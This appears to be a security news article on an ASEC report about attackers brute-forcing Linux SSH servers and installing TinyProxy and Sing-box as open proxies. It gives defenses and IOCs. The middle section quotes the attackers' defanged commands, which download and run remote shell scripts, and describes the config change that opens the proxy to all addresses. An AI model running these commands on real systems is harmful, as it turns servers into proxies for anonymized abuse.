Linux

Linux SSH Servers Under Siege – Hackers Deploying TinyProxy and Sing-box Proxy Tools

The AhnLab Security Intelligence Center (ASEC) has sounded the alarm over a new wave of cyberattacks targeting Linux servers with weak or default SSH credentials.

Using sophisticated honeypots, ASEC has observed a sharp rise in attacks that exploit misconfigured servers to deploy proxy tools specifically, TinyProxy and Sing-box.

Unlike traditional malware, these attacks leverage legitimate open-source software, making detection and response more challenging for system administrators.

Attackers Favor Legitimate Tools to Evade Detection

ASEC discovered that compromised Linux servers are being converted into proxy nodes with almost surgical precision.

Attackers, after brute-forcing SSH logins, execute simple yet effective commands to deploy their payloads. In one observed scenario, the following command was used to download and launch a malicious Bash script:

text(wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh

This script installs TinyProxy via the system’s package manager and configures it accordingly.

By purging restrictive “Allow” and “Deny” lines and inserting “Allow 0.0.0.0/0” into the configuration file, attackers grant unrestricted external access through TinyProxy’s default port 8888.

This effectively transforms the server into an open proxy, potentially enabling a range of anonymized cyber activities, such as DDoS operations and accessing illegal content.

Sing-box: Multipurpose Proxy for Bypassing Geo-blocks

Another alarming case involves the deployment of Sing-box, a powerful, open-source proxy tool capable of supporting multiple advanced protocols (vmess-argo, vless-reality, Hysteria2, TUICv5). Attackers gain elevated access, then run scripts like:

textbash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)

or

textwget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh

Initially developed to bypass regional restrictions on services like ChatGPT and Netflix, Sing-box is now being exploited by threat actors who install it on foreign Virtual Private Servers (VPS) for profit or anonymity.

Sing-box GitHub Page

With unauthorized Sing-box instances, attackers can reroute their traffic, evade law enforcement, or sell proxy access on underground markets.

Recommendations: Securing Linux Against Proxy Abuse

This growing trend of abusing open-source proxies highlights the need for heightened server security. ASEC recommends that all Linux server administrators:

  • Enforce strong, regularly updated SSH passwords and disable root login where possible.
  • Patch systems promptly to close known vulnerabilities.
  • Deploy firewalls and monitor server access to restrict unwanted connections.
  • Use reputable security solutions, such as AhnLab’s V3, to detect and remediate malware early.

Proactive defense and vigilant monitoring are crucial in preventing servers from being recruited into illicit proxy networks that increasingly utilize legitimate tools to evade detection.

IOCs

MD5

16d1dfa35d64046128290393512171ce

35d79027834a3b6270455f59b54f2e19URL

URL

https[:]//0x0[.]st/8VDs[.]sh

https[:]//raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh

Priya

Recent Posts

Burp Suite Supercharges Its Scanning Capabilities With React2Shell Vulnerability Detection

PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…

4 months ago

Malicious MCP Servers Enable New Prompt Injection Attack To Drain Resources

Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…

4 months ago

Law Enforcement Detains Hackers Equipped With Specialized Flipper Hacking Tools

Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…

4 months ago

Google Unveils 10 New Gemini-Powered AI Features For Chrome

Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…

4 months ago

CISA Alerts On Actively Exploited Buffer Overflow Flaw In D-Link Routers

Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…

4 months ago

Over 500 Apache Tika Toolkit Instances Exposed To Critical XXE Vulnerability

Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…

4 months ago